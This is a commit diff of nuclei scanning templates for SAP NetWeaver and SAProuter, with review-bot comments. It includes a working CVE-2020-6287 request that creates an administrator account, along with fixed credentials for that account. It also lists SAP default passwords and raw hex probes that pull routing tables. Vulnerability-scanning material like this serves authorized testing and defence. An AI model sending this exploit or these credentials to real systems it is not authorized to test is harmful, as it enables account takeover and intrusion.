commit
0013f94807
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-6287
|
||||
|
||||
info:
|
||||
name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
|
||||
name: SAP NetWeaver - Remote Admin addition
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
tags: cve,cve2020,sap
|
||||
|
@ -11,24 +11,32 @@ info:
|
|||
- https://launchpad.support.sap.com/#/notes/2934135
|
||||
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
|
||||
- https://www.onapsis.com/recon-sap-cyber-security-vulnerability
|
||||
- https://github.com/chipik/SAP_RECON
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
data: helpers/payloads/CVE-2020-6287.xml
|
||||
raw:
|
||||
- raw:
|
||||
- |
|
||||
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/xml; charset=UTF-8
|
||||
Connection: close
|
||||
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('§data§')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>
|
||||
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
|
||||
</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
|
||||
|
||||
# userName - sapRpoc6351
|
||||
# password - Secure!PwD8890
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "urn:CTCWebServiceSi"
|
||||
- "CTCWebServiceSi"
|
||||
- "SOAP-ENV"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
@ -36,4 +44,5 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- "text/xml"
|
||||
part: header
|
||||
- "SAP NetWeaver Application Server"
|
||||
part: header
|
||||
|
|
|
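Review bot: The new `name` (`SAP NetWeaver - Remote Admin addition`) drops the one fact the old name stated — that a successful request creates an administrative account on the target — and the only remaining record of that side effect and of the fixed credentials is the two trailing `# userName` / `# password` comments; add an `info.description` such as `description: Intrusive check - a successful request creates a new administrator account on the host (credentials are listed in the comments below); remove the account after testing.` Because the request body now carries the user record as an opaque base64 blob instead of `{{base64('§data§')}}` over the helper file, a reviewer can no longer confirm that those comments match what is actually sent, so keep them directly next to the blob and note that both must be updated together. The body matcher (`urn:CTCWebServiceSi`, `CTCWebServiceSi`, `SOAP-ENV` with status 200) only shows that the CTC endpoint answered with a SOAP envelope, not that the account was created, so the finding should not be reported as a confirmed creation unless a success marker from the response is added; this is inferred from the visible matchers and worth checking against a real response. The `requests` block runs across the three hunks, so parts of it are not visible here.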
@ -1,10 +1,10 @@
|
|||
id: sap-netweaver-portal-detect
|
||||
id: sap-netweaver-portal
|
||||
|
||||
info:
|
||||
name: SAP NetWeaver Portal detect
|
||||
name: SAP NetWeaver Portal
|
||||
author: organiccrap
|
||||
severity: info
|
||||
tags: panel
|
||||
tags: panel,sap
|
||||
|
||||
# SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2&
|
||||
|
|
@ -1,36 +0,0 @@
|
|||
id: sap-recon-detect
|
||||
|
||||
info:
|
||||
name: SAP RECON Finder
|
||||
author: samueladi_ & organiccrap
|
||||
severity: medium
|
||||
tags: panel
|
||||
|
||||
# Source:- https://github.com/chipik/SAP_RECON
|
||||
# This is detection template, please use above poc to exploit this further.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/CTCWebService/CTCWebServiceBean"
|
||||
- "{{BaseURL}}/CTCWebService/CTCWebServiceBean?wsdl"
|
||||
- "{{BaseURL}}/CTCWebService/Config1?wsdl"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- Method Not Allowed
|
||||
- Expected request method POST. Found GET.
|
||||
- Generated by WSDLDefinitionsParser
|
||||
- bns0:Config1Binding
|
||||
- wsdl:definitions
|
||||
- tns:CTCWebServiceSiBinding
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 405
|
||||
- 200
|
||||
condition: or
|
|
@ -1 +0,0 @@
|
|||
<root><user><JavaOrABAP>java</JavaOrABAP><username>projectdiscover</username><password>proj3ctD1$c0v3ry</password><userType></userType></user></root>
|
|
@ -0,0 +1,25 @@
|
|||
id: sap-netweaver-info-leak
|
||||
|
||||
info:
|
||||
name: SAP NetWeaver ICM Info page leak
|
||||
author: randomstr1ng
|
||||
description: Detection of SAP NetWeaver ABAP Webserver /public/info page
|
||||
severity: medium
|
||||
tags: sap,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/sap/public/info"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "RFC_SYSTEM_INFO.Response"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "<RFCDEST>.*</RFCDEST>"
|
|
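Review bot: In the `regex` matcher, `RFC_SYSTEM_INFO.Response` leaves the `.` unescaped, so it is a wildcard rather than a literal dot; either escape it (`- 'RFC_SYSTEM_INFO\.Response'`) or, since no regex feature is used, make it a `type: word` matcher. The extractor pattern `<RFCDEST>.*</RFCDEST>` is greedy, so a body with more than one `RFCDEST` element yields a single match spanning from the first opening tag to the last closing tag; `<RFCDEST>[^<]*</RFCDEST>` returns each value separately. There is no status matcher, so an error page that happens to echo the string would also match; adding `- type: status` with `- 200` under `matchers-condition: and` would tighten the detection.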
@ -0,0 +1,24 @@
|
|||
id: sap-router-info-leak
|
||||
|
||||
info:
|
||||
name: SAPRouter - Routing information leak
|
||||
author: randomstr1ng
|
||||
severity: critical
|
||||
tags: network,sap
|
||||
|
||||
network:
|
||||
- inputs:
|
||||
- data: 00000022524f555445525f41444d002802000000000000000000000000000000000000000000
|
||||
type: hex
|
||||
|
||||
host:
|
||||
- "{{Hostname}}"
|
||||
- "{{Hostname}}:3299"
|
||||
read-size: 2048
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Routtab"
|
||||
- "Working directory"
|
||||
- "SAProuter Connection Table"
|
|
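Review bot: The request is a raw hex string with no comment saying what it decodes to, so a reviewer cannot audit what the template sends to port 3299 without decoding it by hand; add a comment above `- data:` describing the decoded request in words (the same applies to the `data:` line in the new `network/sap-router.yaml` section below). `info` has no `description`, and `severity: critical` for a routing-table disclosure is not self-explanatory — add e.g. `description: SAProuter answers an unauthenticated information request with its routing table and working directory.` The word matcher sets no `condition`, so whether one banner string or all three must appear is left to the engine default; state it explicitly (`condition: or` if any one string suffices). Listing both `{{Hostname}}` and `{{Hostname}}:3299` presumably covers inputs with and without a port, but an input that already carries a port may render the second entry as `host:port:3299`; confirm how nuclei resolves that.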
@ -0,0 +1,22 @@
|
|||
id: sap-router
|
||||
|
||||
info:
|
||||
name: SAPRouter Detection
|
||||
author: randomstr1ng
|
||||
severity: info
|
||||
tags: network,sap
|
||||
|
||||
network:
|
||||
- inputs:
|
||||
- data: 57484f415245594f553f0a
|
||||
type: hex
|
||||
|
||||
host:
|
||||
- "{{Hostname}}"
|
||||
- "{{Hostname}}:3299"
|
||||
read-size: 1024
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "SAProuter"
|
|
@ -1,20 +0,0 @@
|
|||
id: sap-netweaver-as-java-detect
|
||||
|
||||
info:
|
||||
name: SAP NetWeaver AS JAVA (LM Configuration Wizard) Detection
|
||||
author: dwisiswant0
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/CTCWebService/CTCWebServiceBean?wsdl"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "urn:CTCWebServiceSi"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,13 +1,30 @@
|
|||
id: sap-netweaver-detect
|
||||
|
||||
info:
|
||||
name: SAP NetWeaver Detect
|
||||
author: rakeshmane10
|
||||
name: SAP NetWeaver ICM Detection
|
||||
author: randomstr1ng
|
||||
description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF)
|
||||
severity: info
|
||||
tags: sap,webserver
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/irj/portal'
|
||||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- NetWeaver
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- "sap-server:"
|
||||
- "Sap-Server:"
|
||||
- "SAP NetWeaver Application Server"
|
||||
condition: or
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
part: header
|
||||
kval:
|
||||
- "server"
|
||||
|
|
|
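Review bot: The header regex lists `sap-server:` and `Sap-Server:` as two separate casings, but HTTP header names are case-insensitive and servers and proxies emit other variants (for example `SAP-Server:`), which this pair misses; replace both with one case-insensitive pattern, `- '(?i)sap-server:'`, and consider the same for the `SAP NetWeaver Application Server` value. The body word matcher `NetWeaver` appears to belong to the old side of the hunk; if it is gone, a host that sets neither header is no longer detected, which may be intended for an ICM-specific template but should be mentioned in `description`. With `redirects: true` the headers examined are those of the final hop, so if nuclei follows cross-host redirects a third party's `Server` header could be attributed to the target; a comment on why `max-redirects: 2` is safe, or a host-restricting check, is worth adding.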
@ -0,0 +1,23 @@
|
|||
id: sap-nw-webgui
|
||||
|
||||
info:
|
||||
name: SAP NetWeaver WebGUI Detection
|
||||
author: randomstr1ng
|
||||
description: Detection of SAP NetWeaver ABAP Webserver WebGUI
|
||||
severity: info
|
||||
tags: sap,webserver
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/sap/bc/gui/sap/its/webgui"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "sap-system-login"
|
||||
- "<title>Logon</title>"
|
||||
condition: or
|
|
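Review bot: With `condition: or`, the second word `<title>Logon</title>` matches any login page that uses that title, not only SAP WebGUI, so the template will report non-SAP hosts; `sap-system-login` is the SAP-specific token. Either drop the generic title, switch to `condition: and`, or pair the body matcher with a header check such as the `sap-server:` regex used in `sap-netweaver-detect.yaml` under `matchers-condition: and`. Since `redirects: true` is set, the body examined may be a generic SSO page reached after redirection, which makes the title-only match more likely to misfire.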
@ -6,10 +6,18 @@ info:
|
|||
description: A simple workflow that runs all SAP NetWaver related nuclei templates on a given target.
|
||||
tags: workflow
|
||||
|
||||
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
|
||||
# Old workflows still remains valid, and will be working with all nuclei versions.
|
||||
|
||||
workflows:
|
||||
- template: technologies/sap-netweaver-as-java-detect.yaml
|
||||
- template: technologies/sap-netweaver-detect.yaml # HTTP Templates
|
||||
subtemplates:
|
||||
- template: cves/2020/CVE-2020-6287.yaml
|
||||
- template: cves/2017/CVE-2017-12637.yaml
|
||||
- template: cves/2020/CVE-2020-6308.yaml
|
||||
- template: exposed-panels/fiorilaunchpad-logon.yaml
|
||||
- template: exposed-panels/hmc-hybris-panel.yaml
|
||||
- template: exposed-panels/sap-netweaver-portal.yaml
|
||||
- template: exposed-panels/sap-hana-xsengine-panel.yaml
|
||||
- template: misconfiguration/sap/
|
||||
|
||||
- template: network/sap-router.yaml # Network Templates
|
||||
subtemplates:
|
||||
- template: network/sap-router-info-leak.yaml
|
||||
|
|
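Review bot: The subtemplate list runs the intrusive `cves/2020/CVE-2020-6287.yaml` (which creates an administrator account on an affected host) automatically on every host the detector matches, but the workflow `description` only says it "runs all SAP NetWaver related nuclei templates"; state that a state-changing check is included so operators can opt out, e.g. `description: Runs SAP NetWeaver detection and, on a match, the SAP CVE, panel and misconfiguration templates; CVE-2020-6287 is intrusive and creates an account.` The entry `- template: misconfiguration/sap/` is a directory while every other entry is a file; confirm the workflow loader accepts a directory here, otherwise the entry is silently ignored. The parent `technologies/sap-netweaver-detect.yaml` is now documented as an ABAP/ICM detector while the `CVE-2020-6287` subtemplate targets AS Java; whether AS Java hosts still match the parent's header regex is not visible here and is worth checking, since otherwise the Java check never runs. The file's `id`/`info` head lies outside the hunk.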